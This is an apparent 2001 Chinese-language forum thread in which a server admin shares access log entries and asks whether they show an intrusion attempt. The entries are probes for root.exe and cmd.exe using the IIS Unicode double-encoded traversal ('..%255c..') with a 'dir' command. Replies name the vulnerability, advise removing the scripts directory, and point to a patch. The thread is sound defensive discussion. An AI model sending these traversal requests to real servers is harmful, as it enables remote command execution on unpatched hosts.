各位先進, 最近在我的 web server log 中的 log 有很多下述的 message

211.167.243.57 - - [19/Sep/2001:08:00:18 +0800] "GET /scripts/root.exe?/c+dir HT
TP/1.0" 404 286 "-" "-"
211.167.243.57 - - [19/Sep/2001:08:00:18 +0800] "GET /MSADC/root.exe?/c+dir HTTP
/1.0" 404 284 "-" "-"
211.167.243.57 - - [19/Sep/2001:08:00:19 +0800] "GET /c/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 294 "-" "-"
211.167.243.57 - - [19/Sep/2001:08:00:19 +0800] "GET /d/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 294 "-" "-"
211.167.243.57 - - [19/Sep/2001:08:00:20 +0800] "GET /scripts/..%255c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
211.167.243.57 - - [19/Sep/2001:08:00:21 +0800] "GET /_vti_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
211.167.243.57 - - [19/Sep/2001:08:00:21 +0800] "GET /_mem_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"

而且對方 IP 一直換..
這是不是有人在試圖侵入呢??? 還是對方的機器中毒了呢???

謝謝...

贊助商連結

沒錯的話 應該是 有人利用UNICODE的漏洞嘗試入侵
趕快去 查察 你有哪些漏洞沒捕的
小心 被上傳木馬

很明顯的,是用IIS的漏洞入侵,而且只要用IE就可以先進到C:/下了.
建議你,如果scripts沒有用的話(大部份人都是不用的,你可以檢查一下)砍掉此目錄即可.

中文版修正unicode問題之檔案 (ftp.cert.org.tw/patch/w2k_unicode/q269862_w2k_sp2_x86_tw.exe)


台灣電腦網路危機處理中心 (http://www.cert.org.tw/cindex.htm)